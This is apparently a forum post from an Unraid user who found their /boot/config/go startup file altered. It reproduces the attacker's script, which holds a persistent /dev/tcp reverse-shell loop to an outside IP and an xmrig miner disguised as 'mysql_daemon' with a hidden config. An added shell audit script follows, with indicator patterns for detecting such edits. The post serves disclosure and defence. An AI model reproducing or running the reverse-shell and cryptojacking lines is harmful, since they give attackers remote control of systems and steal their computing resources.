Just a follow-up on this. I checked my /boot/config/go file and found someone had edited it to mine XMR! Full file contents below:
#!/bin/bash
# Start the Management Utility
/usr/local/sbin/emhttp &
mkdir /root/.ssh
chmod 700 /root/.ssh
cp /boot/config/ssh/authorized_keys /root/.ssh/
chmod 600 /root/.ssh/authorized_keys
nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6>
cd /dev/shm
wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li>
tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz
cd xmrig-6.7.0/
mv xmrig /usr/bin/mysql_daemon
mkdir -p /etc/mysql/conf.d
echo '{
"autosave": true,
"background": true,
"cpu": {
"enabled": true,
"max-threads-hint": 50
},
"max-cpu-usage": 25,
"cpu-priority": 1,
"opencl": false,
"cuda": false,
"pools": [
{
"url": "pool.minexmr.com:443",
"user": "49mWMCJRxCpcCAVixaEEk5hapQGTVF775eTKqafNU9mCg7JegujvjB>
"keepalive": true,
"tls": true
}
]
}' > /etc/mysql/conf.d/.config.json
/usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B
rm -r /dev/shm/xmrig-6.7.0
rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz
Not sure how they got access to be able to do this, but it's pretty worrying. I've removed the contents for now and changed passwords/ports etc.
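For anyone else checking their own box after reading this: the go file is a startup script, so anything an attacker appends to it survives reboots. Below is a small audit script added here as an example (it is not from the post above and not part of Unraid). It assumes the stock go file is exactly the first three lines shown in the posted file, and the indicator list is constructed from what that posted script does (the /dev/tcp reverse shell loop, staging in /dev/shm, the xmrig download, the rename to mysql_daemon, and the hidden .config.json). The sample file it scans is constructed inline for the demo; point the functions at /boot/config/go on a real system.

```shell
#!/bin/sh
# Added example, not code from the forum post: audit an Unraid /boot/config/go
# file by (1) listing every line beyond the stock three-line file and
# (2) grepping for the indicators seen in the compromised file above.
# The indicator list and the sample file are constructed for this example.

# Extended regex of indicators taken from the posted script. Not exhaustive;
# any line reported by go_extra_lines deserves a look even if it does not match.
INDICATORS='/dev/tcp/|/dev/shm|xmrig|mysql_daemon|/\.[A-Za-z0-9_-]*\.json|nohup .*while true'

# Print every line of the file $1 that is not one of the three stock lines
# (assumption: an untouched go file contains exactly these three lines).
# Exit status follows grep: 0 if extra lines exist, 1 if the file is stock.
go_extra_lines() {
    grep -vxF -e '#!/bin/bash' \
              -e '# Start the Management Utility' \
              -e '/usr/local/sbin/emhttp &' "$1"
}

# Print line-numbered indicator hits in $1; exit 0 if any matched, 1 if none.
go_indicator_lines() {
    grep -nE "$INDICATORS" "$1"
}

# Print the number of lines in $1 that hit an indicator (prints 0 when clean).
go_indicator_count() {
    grep -cE "$INDICATORS" "$1" || true
}

# Demo on a constructed sample: a stock go file with three of the posted
# lines appended (the non-truncated ones).
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
#!/bin/bash
# Start the Management Utility
/usr/local/sbin/emhttp &
cd /dev/shm
mv xmrig /usr/bin/mysql_daemon
/usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B
EOF

echo "Lines beyond the stock go file:"
go_extra_lines "$SAMPLE"
echo "Indicator hits: $(go_indicator_count "$SAMPLE")"
go_indicator_lines "$SAMPLE"
rm -f "$SAMPLE"
```

Usage on a live system: `go_extra_lines /boot/config/go` is the check worth running first, because it flags any edit at all rather than only the ones this particular attacker made; the indicator grep is a second pass that tells you whether the extra lines look like this specific miner/reverse-shell pattern. Pair it with a look for the renamed binary (`ls -l /usr/bin/mysql_daemon`), the hidden config under /etc/mysql/conf.d, and any process with an outbound connection on an unexpected port.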